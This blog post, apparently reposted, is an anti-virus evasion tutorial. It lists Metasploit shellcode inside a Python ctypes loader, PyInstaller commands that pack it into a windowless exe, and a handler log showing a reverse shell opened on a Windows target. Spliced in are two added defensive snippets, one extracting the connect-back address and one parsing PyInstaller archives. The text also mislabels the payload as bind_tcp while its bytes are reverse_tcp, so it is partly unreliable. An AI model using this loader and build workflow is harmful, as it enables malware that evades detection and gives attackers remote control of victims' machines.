Metasploit - Tips for Evading Anti-Virus

2024-05-31 02:08


There are many ways to bypass anti-virus software. This post covers one of them: write a Python program that calls shellcode, then compile that Python program into an exe with PyInstaller.


Preparation (compiled on Windows XP):

Compiling a Python program into an exe requires the Python interpreter, the pywin32 library, and PyInstaller (extract it directly to C:\). If error messages appear during the build, fix the problem as the message indicates. The installation is not complicated and is not described here.

https://www.python.org/ftp/python/2.7.8/python-2.7.8.msi
http://softlayer-dal.dl.sourceforge.net/project/pywin32/pywin32/Build%20219/pywin32-219.win32-py2.7.exe
https://pypi.python.org/packages/source/P/PyInstaller/PyInstaller-2.1.tar.gz


Use Metasploit to generate the shellcode that the Python program below will use.

msf payload(shell_bind_tcp) > show options  
 
Module options (payload/windows/shell_bind_tcp):
 
   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  seh              yes       Exit technique (accepted: seh, thread, process, none)
   LPORT     4444             yes       The listen port
   RHOST     0.0.0.0          no        The target address
 
msf payload(shell_bind_tcp) > generate -b '\x00' -f /home/nixawk/bind_tcp.txt -p windows -t c
[*] Writing 1803 bytes to /home/nixawk/bind_tcp.txt...


With preparation done, the Python program source is as follows:

from ctypes import *

# Raw x86 shellcode emitted by `generate -t c` above, pasted as a Python 2 str
# (on Python 2 a str literal with \x escapes is already a byte string).
shellcode = '\xfc\xe8\x86\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x8b\x4c\x10\x78\xe3\x4a\x01\xd1\x51\x8b\x59\x20\x01\xd3\x8b\x49\x18\xe3\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x58\x5f\x5a\x8b\x12\xeb\x89\x5d\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\xff\xd5\xb8\x90\x01\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b\x00\xff\xd5\x50\x50\x50\x50\x40\x50\x40\x50\x68\xea\x0f\xdf\xe0\xff\xd5\x97\x6a\x05\x68\xc0\xa8\x01\x6b\x68\x02\x00\x11\x5c\x89\xe6\x6a\x10\x56\x57\x68\x99\xa5\x74\x61\xff\xd5\x85\xc0\x74\x0c\xff\x4e\x08\x75\xec\x68\xf0\xb5\xa2\x56\xff\xd5\x6a\x00\x6a\x04\x56\x57\x68\x02\xd9\xc8\x5f\xff\xd5\x8b\x36\x6a\x40\x68\x00\x10\x00\x00\x56\x6a\x00\x68\x58\xa4\x53\xe5\xff\xd5\x93\x53\x6a\x00\x56\x53\x57\x68\x02\xd9\xc8\x5f\xff\xd5\x01\xc3\x29\xc6\x85\xf6\x75\xec\xc3'

# Copy the bytes into a ctypes buffer, treat the buffer's address as a function
# taking no arguments, and call it so execution jumps into the shellcode.
memorywithshell = create_string_buffer(shellcode, len(shellcode))
shell = cast(memorywithshell, CFUNCTYPE(c_void_p))
shell()
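From the analyst's side, an added example (not part of the original post) that recovers the connect-back address hardcoded in a Metasploit x86 Windows reverse_tcp stub such as the one listed above: the stub builds its sockaddr_in with `push <ip>; push <AF_INET|port>; mov esi, esp`, which is the byte pattern `68 <ip> 68 02 00 <port> 89 e6`. The sample input is the C-escaped fragment of the shellcode above that covers that setup (a constructed excerpt, in the same text format `generate -t c` writes), and it yields 192.168.1.107:4444, matching the handler shown later in the post.

```python
import re
import socket
import struct

# Metasploit's x86 Windows reverse_tcp stub builds its sockaddr_in on the
# stack with two immediate pushes:  push <ip>; push <port|AF_INET>; mov esi,esp
# i.e. the bytes  68 <4 ip bytes> 68 02 00 <2 port bytes> 89 e6
SOCKADDR_PUSH = re.compile(rb"\x68(.{4})\x68\x02\x00(.{2})\x89\xe6", re.DOTALL)


def c_escapes_to_bytes(text):
    """Turn the `\\x..` C-string output of `msf generate -t c` into raw bytes."""
    return bytes.fromhex("".join(re.findall(r"\\x([0-9a-fA-F]{2})", text)))


def extract_reverse_tcp_iocs(shellcode):
    """Return every (ip, port) pair hardcoded in an x86 reverse_tcp stub."""
    iocs = []
    for m in SOCKADDR_PUSH.finditer(shellcode):
        ip = socket.inet_ntoa(m.group(1))           # bytes are already in network order
        port = struct.unpack("!H", m.group(2))[0]   # sockaddr_in port is big-endian
        iocs.append((ip, port))
    return iocs


# Constructed sample: the C-escaped fragment of the shellcode listed above that
# covers the socket-address setup (the rest of the stub is omitted here).
SAMPLE_C_OUTPUT = (
    r'"\x97\x6a\x05\x68\xc0\xa8\x01\x6b\x68\x02\x00\x11\x5c\x89\xe6"'
    r'"\x6a\x10\x56\x57\x68\x99\xa5\x74\x61\xff\xd5";'
)

if __name__ == "__main__":
    for ip, port in extract_reverse_tcp_iocs(c_escapes_to_bytes(SAMPLE_C_OUTPUT)):
        print("reverse_tcp connect-back: %s:%d" % (ip, port))
```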


Compile the Python file containing the shellcode above with PyInstaller; the commands are as follows:


C:\PyInstaller-2.1\utils>python makespec.py --onefile --noconsole shellcode.py

wrote C:\PyInstaller-2.1\utils\shellcode.spec
now run pyinstaller.py to build the executable

C:\PyInstaller-2.1\utils>python build.py shellcode.spec

59 INFO: Testing for ability to set icons, version resources...
69 INFO: ... resource update available
79 INFO: UPX is not available.
109 INFO: Processing hook hook-os
259 INFO: Processing hook hook-time
259 INFO: Processing hook hook-cPickle
349 INFO: Processing hook hook-_sre
509 INFO: Processing hook hook-cStringIO
639 INFO: Processing hook hook-encodings
660 INFO: Processing hook hook-codecs
1171 INFO: Extending PYTHONPATH with C:\PyInstaller-2.1\utils
1171 INFO: checking Analysis
1171 INFO: building Analysis because out00-Analysis.toc non existent
1171 INFO: running Analysis out00-Analysis.toc
1171 INFO: Adding Microsoft.VC90.CRT to dependent assemblies of final executable
1171 INFO: Searching for assembly x86_Microsoft.VC90.CRT_1fc8b3b9a1e18e3b_9.0.21022.8_x-ww ...
1171 WARNING: Assembly not found
1180 ERROR: Assembly x86_Microsoft.VC90.CRT_1fc8b3b9a1e18e3b_9.0.21022.8_x-ww not found
1220 WARNING: lib not found: MSVCR90.dll dependency of C:\Python27\python.exe
1230 INFO: Searching for assembly x86_Microsoft.VC90.CRT_1fc8b3b9a1e18e3b_9.0.21022.8_x-ww ...
1230 WARNING: Assembly not found
1230 ERROR: Assembly x86_Microsoft.VC90.CRT_1fc8b3b9a1e18e3b_9.0.21022.8_x-ww not found
1351 WARNING: lib not found: MSVCR90.dll dependency of C:\WINDOWS\system32\python27.dll
1351 INFO: Analyzing C:\PyInstaller-2.1\PyInstaller\loader\_pyi_bootstrap.py
1381 INFO: Processing hook hook-os
1401 INFO: Processing hook hook-site
1421 INFO: Processing hook hook-encodings
1562 INFO: Processing hook hook-time
1562 INFO: Processing hook hook-cPickle
1661 INFO: Processing hook hook-_sre
1822 INFO: Processing hook hook-cStringIO
1961 INFO: Processing hook hook-codecs
2463 INFO: Processing hook hook-pydoc
2632 INFO: Processing hook hook-email
2713 INFO: Processing hook hook-httplib
2763 INFO: Processing hook hook-email.message
2844 INFO: Analyzing C:\PyInstaller-2.1\PyInstaller\loader\pyi_importers.py
2904 INFO: Analyzing C:\PyInstaller-2.1\PyInstaller\loader\pyi_archive.py
2963 INFO: Analyzing C:\PyInstaller-2.1\PyInstaller\loader\pyi_carchive.py
3043 INFO: Analyzing C:\PyInstaller-2.1\PyInstaller\loader\pyi_os_path.py
3043 INFO: Analyzing shellcode.py
3114 INFO: Hidden import 'codecs' has been found otherwise
3114 INFO: Hidden import 'encodings' has been found otherwise
3114 INFO: Looking for run-time hooks
3154 WARNING: lib not found: MSVCR90.dll dependency of C:\Python27\DLLs\select.pyd
3203 WARNING: lib not found: MSVCR90.dll dependency of C:\Python27\DLLs\unicodedata.pyd
3273 WARNING: lib not found: MSVCR90.dll dependency of C:\Python27\DLLs\_hashlib.pyd
3323 WARNING: lib not found: MSVCR90.dll dependency of C:\Python27\DLLs\bz2.pyd
3414 WARNING: lib not found: MSVCR90.dll dependency of C:\Python27\DLLs\_ssl.pyd
3484 WARNING: lib not found: MSVCR90.dll dependency of C:\Python27\DLLs\_ctypes.pyd
3555 WARNING: lib not found: MSVCR90.dll dependency of C:\Python27\DLLs\_socket.pyd
3575 INFO: Using Python library C:\WINDOWS\system32\python27.dll
3625 INFO: Warnings written to C:\PyInstaller-2.1\utils\build\shellcode\warnshellcode.txt
3634 INFO: checking PYZ
3634 INFO: rebuilding out00-PYZ.toc because out00-PYZ.pyz is missing
3634 INFO: building PYZ (ZlibArchive) out00-PYZ.toc
4815 INFO: checking PKG
4815 INFO: rebuilding out00-PKG.toc because out00-PKG.pkg is missing
4815 INFO: building PKG (CArchive) out00-PKG.pkg
6167 INFO: checking EXE
6167 INFO: rebuilding out00-EXE.toc because shellcode.exe missing
6167 INFO: building EXE from out00-EXE.toc
6167 INFO: Appending archive to EXE C:\PyInstaller-2.1\utils\dist\shellcode.exe
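As an added example that is not part of the original post, a defender-side triage check for the kind of artefact this build produces: a PyInstaller one-file executable ends with an 88-byte CArchive trailer (magic `MEI\x0c\x0b\x0a\x0b\x0e`, layout `!8siiii64s` in PyInstaller 2.x) appended after the bootloader, from which the archive bounds, Python version and Python DLL name can be read without running the file. The EXE bytes below are constructed stand-ins, not a real build.

```python
import struct

# Trailer ("cookie") PyInstaller 2.x appends to the self-extracting archive that
# is glued onto the bootloader EXE: magic, total archive length (including this
# cookie), TOC offset, TOC length, Python version (e.g. 27), Python DLL name.
PYI_MAGIC = b"MEI\x0c\x0b\x0a\x0b\x0e"
COOKIE_FMT = "!8siiii64s"
COOKIE_LEN = struct.calcsize(COOKIE_FMT)   # 88 bytes


def parse_pyinstaller_cookie(data):
    """Return the cookie fields if `data` looks PyInstaller-built, else None."""
    pos = data.rfind(PYI_MAGIC)
    if pos < 0 or pos + COOKIE_LEN > len(data):
        return None
    _, pkg_len, toc_pos, toc_len, pyvers, pylib = struct.unpack_from(COOKIE_FMT, data, pos)
    if not (0 < toc_len <= pkg_len <= len(data)):
        return None   # magic present but the trailer is inconsistent
    return {
        "archive_len": pkg_len,
        "toc_pos": toc_pos,
        "toc_len": toc_len,
        "python_version": pyvers,                      # 27 for a Python 2.7 build
        "python_lib": pylib.rstrip(b"\x00").decode("ascii", "replace"),
        "archive_start": pos + COOKIE_LEN - pkg_len,   # offset where the bootloader ends
    }


def build_sample_exe():
    """Constructed stand-in for dist\\shellcode.exe: fake loader + archive + cookie."""
    bootloader = b"MZ" + b"\x00" * 62 + b"PE\x00\x00" + b"\x90" * 100   # not a real PE
    payload = b"<constructed PYZ and script entries>"
    toc = b"<constructed toc>"
    pkg_len = len(payload) + len(toc) + COOKIE_LEN
    cookie = struct.pack(COOKIE_FMT, PYI_MAGIC, pkg_len, len(payload), len(toc), 27, b"python27.dll")
    return bootloader + payload + toc + cookie


if __name__ == "__main__":
    print(parse_pyinstaller_cookie(build_sample_exe()))
    print(parse_pyinstaller_cookie(b"MZ" + b"\x00" * 200))   # None: no PyInstaller trailer
```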

After the build completes, place shellcode.exe on the target host and run it; a reverse shell is obtained.

msf exploit(handler) > set payload windows/shell/reverse_tcp
payload => windows/shell/reverse_tcp
msf exploit(handler) > show options  
 
Module options (exploit/multi/handler):
 
   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------
 
 
Payload options (windows/shell/reverse_tcp):
 
   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (accepted: seh, thread, process, none)
   LHOST                      yes       The listen address
   LPORT     4444             yes       The listen port
 
 
Exploit target:
 
   Id  Name
   --  ----
   0   Wildcard Target
 
 
msf exploit(handler) > set LHOST 192.168.1.107
LHOST => 192.168.1.107
msf exploit(handler) > run
 
[*] Started reverse handler on 192.168.1.107:4444  
[*] Starting the payload handler...
[*] Encoded stage with x86/shikata_ga_nai
[*] Sending encoded stage (267 bytes) to 192.168.1.112
[*] Command shell session 1 opened (192.168.1.107:4444 -> 192.168.1.112:2061) at 2014-08-28 12:51:54 +0800
 
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
 
C:\PyInstaller-2.1\utils> 


References:
http://pen-testing.sans.org/blog/pen-testing/2011/10/13/tips-for-evading-anti-virus-during-pen-testing
https://community.rapid7.com/community/metasploit/blog/2014/03/26/new-metasploit-49-helps-evade-anti-virus-solutions-test-network-segmentation-and-increase-productivity-for-penetration-testers
http://www.scriptjunkie.us/2011/04/why-encoding-does-not-matter-and-how-metasploit-generates-exes/
http://schierlm.users.sourceforge.net/avevasion.html
http://www.pentestgeek.com/2012/01/25/using-metasm-to-avoid-antivirus-detection-ghost-writing-asm/




http://www.chinasem.cn/article/1017235
